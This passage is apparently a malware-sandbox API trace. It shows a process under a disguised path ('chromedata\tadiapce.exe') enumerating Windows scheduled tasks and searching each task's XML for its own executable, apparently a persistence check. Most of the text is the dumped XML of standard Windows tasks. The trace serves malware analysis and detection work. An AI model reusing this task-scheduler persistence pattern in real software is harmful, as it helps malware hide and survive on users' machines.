<LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{7CCA6768-8373-4D28-8876-83E8B4E3A969}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.383] IUnknown:Release (This=0x55ff38) returned 0x0
	[0073.383] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.383] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe50) returned 0x0
	[0073.384] ITaskFolderCollection:get_Count (in: This=0x55fe50, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.384] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.384] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.384] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1f, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.384] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe78) returned 0x0
	[0073.385] IRegisteredTaskCollection:get_Count (in: This=0x55fe78, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.385] IRegisteredTaskCollection:get_Item (in: This=0x55fe78, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff80) returned 0x0
	[0073.385] IRegisteredTask:get_Name (in: This=0x55ff80, pName=0x128e3c | out: pName=0x128e3c*="SvcRestartTask") returned 0x0
	[0073.385] IRegisteredTask:get_Xml (in: This=0x55ff80, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\sppc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\sppc.dll,-200)</Author>\r\n    <Description>$(@%systemroot%\\system32\\sppc.dll,-201)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T00:00:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>sc.exe</Command>\r\n      <Arguments>start sppsvc</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.388] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\sppc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\sppc.dll,-200)</Author>\r\n    <Description>$(@%systemroot%\\system32\\sppc.dll,-201)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T00:00:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>sc.exe</Command>\r\n      <Arguments>start sppsvc</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.388] IUnknown:Release (This=0x55ff80) returned 0x0
	[0073.388] IUnknown:Release (This=0x55fe78) returned 0x0
	[0073.388] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe78) returned 0x0
	[0073.389] ITaskFolderCollection:get_Count (in: This=0x55fe78, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.389] IUnknown:Release (This=0x55fe78) returned 0x0
	[0073.389] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.389] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x20, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.389] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe58) returned 0x0
	[0073.389] IRegisteredTaskCollection:get_Count (in: This=0x55fe58, pCount=0x128e30 | out: pCount=0x128e30*=0) returned 0x0
	[0073.389] IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.389] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe58) returned 0x0
	[0073.390] ITaskFolderCollection:get_Count (in: This=0x55fe58, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.390] IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.390] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.390] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x21, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.390] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe60) returned 0x0
	[0073.390] IRegisteredTaskCollection:get_Count (in: This=0x55fe60, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.390] IRegisteredTaskCollection:get_Item (in: This=0x55fe60, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff58) returned 0x0
	[0073.390] IRegisteredTask:get_Name (in: This=0x55ff58, pName=0x128e3c | out: pName=0x128e3c*="SR") returned 0x0
	[0073.391] IRegisteredTask:get_Xml (in: This=0x55ff58, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\srrstr.dll,-320)</Source>\r\n    <Author>$(@%systemroot%\\system32\\srrstr.dll,-321)</Author>\r\n    <Description>$(@%systemroot%\\system32\\srrstr.dll,-322)</Description>\r\n    <URI>Microsoft\\Windows\\SystemRestore\\SR</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"SRCalendarTrigger\">\r\n      <StartBoundary>2005-06-14T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n    <BootTrigger id=\"SRBootTrigger\">\r\n      <Delay>PT30M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>/d srrstr.dll,ExecuteScheduledSPPCreation</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.393] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\srrstr.dll,-320)</Source>\r\n    <Author>$(@%systemroot%\\system32\\srrstr.dll,-321)</Author>\r\n    <Description>$(@%systemroot%\\system32\\srrstr.dll,-322)</Description>\r\n    <URI>Microsoft\\Windows\\SystemRestore\\SR</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"SRCalendarTrigger\">\r\n      <StartBoundary>2005-06-14T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n    <BootTrigger id=\"SRBootTrigger\">\r\n      <Delay>PT30M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>/d srrstr.dll,ExecuteScheduledSPPCreation</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.394] IUnknown:Release (This=0x55ff58) returned 0x0
	[0073.394] IUnknown:Release (This=0x55fe60) returned 0x0
	[0073.394] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe60) returned 0x0
	[0073.399] ITaskFolderCollection:get_Count (in: This=0x55fe60, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.399] IUnknown:Release (This=0x55fe60) returned 0x0
	[0073.399] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.399] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x22, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.399] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe58) returned 0x0
	[0073.400] IRegisteredTaskCollection:get_Count (in: This=0x55fe58, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.400] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.400] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="Interactive") returned 0x0
	[0073.400] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\wdc.dll,-10041)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\wdc.dll,-10042)</Source>\r\n    <URI>Microsoft\\Windows\\Task Manager\\Interactive</URI>\r\n    <Description>$(@%systemroot%\\system32\\wdc.dll,-10043)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <Priority>5</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{855fec53-d2e4-4999-9e87-3414e9cf0ff4}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.401] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\wdc.dll,-10041)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\wdc.dll,-10042)</Source>\r\n    <URI>Microsoft\\Windows\\Task Manager\\Interactive</URI>\r\n    <Description>$(@%systemroot%\\system32\\wdc.dll,-10043)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <Priority>5</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{855fec53-d2e4-4999-9e87-3414e9cf0ff4}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.401] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.401] IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.402] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe58) returned 0x0
	[0073.402] ITaskFolderCollection:get_Count (in: This=0x55fe58, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.402] IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.402] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.402] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x23, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.402] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe50) returned 0x0
	[0073.403] IRegisteredTaskCollection:get_Count (in: This=0x55fe50, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0073.403] IRegisteredTaskCollection:get_Item (in: This=0x55fe50, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff38) returned 0x0
	[0073.403] IRegisteredTask:get_Name (in: This=0x55ff38, pName=0x128e3c | out: pName=0x128e3c*="IpAddressConflict1") returned 0x0
	[0073.403] IRegisteredTask:get_Xml (in: This=0x55ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Tcpip\\IpAddressConflict1</URI>\r\n    <Date>2006-02-23T15:00:57</Date>\r\n    <Author>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"9f81d7ff-8026-44de-94b1-14321e8b9641\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Tcpip'] and EventID=4198]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.405] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Tcpip\\IpAddressConflict1</URI>\r\n    <Date>2006-02-23T15:00:57</Date>\r\n    <Author>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"9f81d7ff-8026-44de-94b1-14321e8b9641\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Tcpip'] and EventID=4198]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.405] IUnknown:Release (This=0x55ff38) returned 0x0
	[0073.405] IRegisteredTaskCollection:get_Item (in: This=0x55fe50, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff38) returned 0x0
	[0073.405] IRegisteredTask:get_Name (in: This=0x55ff38, pName=0x128e3c | out: pName=0x128e3c*="IpAddressConflict2") returned 0x0
	[0073.405] IRegisteredTask:get_Xml (in: This=0x55ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Tcpip\\IpAddressConflict2</URI>\r\n    <Date>2006-02-23T15:00:57</Date>\r\n    <Author>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"ef402a22-96ec-4526-a70a-85d0c36c85f6\">\r\n      <StartBoundary>2006-02-23T16:27:43</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Tcpip'] and EventID=4199]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  